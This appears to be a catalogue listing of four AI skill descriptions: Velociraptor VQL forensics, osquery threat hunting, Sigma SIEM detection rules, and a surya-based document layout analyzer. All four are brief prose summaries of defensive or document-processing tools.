detection-sigma

This skill enables large-scale endpoint forensics and incident response using Velociraptor Query Language (VQL). It's designed for collecting evidence, hunting threats, and performing live response across multiple systems. Developers can use it to gather telemetry, monitor security events, and create custom forensic artifacts for investigations.

This skill enables SQL-based forensic investigation and threat hunting by querying endpoint operating systems as relational databases via osquery. It's designed for rapid evidence collection, incident response, and analyzing system artifacts like processes, network connections, and file hashes across Linux, macOS, and Windows. Use it for live forensics, building detection queries, and hunting for compromise indicators during security incidents.

This skill enables the creation and management of universal, vendor-agnostic SIEM detection rules using the Sigma format. It allows developers to write rules once and convert them for platforms like Splunk, Elastic, QRadar, and Sentinel, facilitating threat hunting and detection-as-code pipelines. Key features include mapping detections to MITRE ATT&CK and implementing compliance monitoring.

The layout-analyzer skill uses the surya library to detect document structure elements like text blocks, tables, and reading order from images or PDFs. Developers should use it when they need programmatic analysis of complex document layouts for processing or extraction tasks. It supports detection of various regions including headings, figures, and determines proper reading sequence.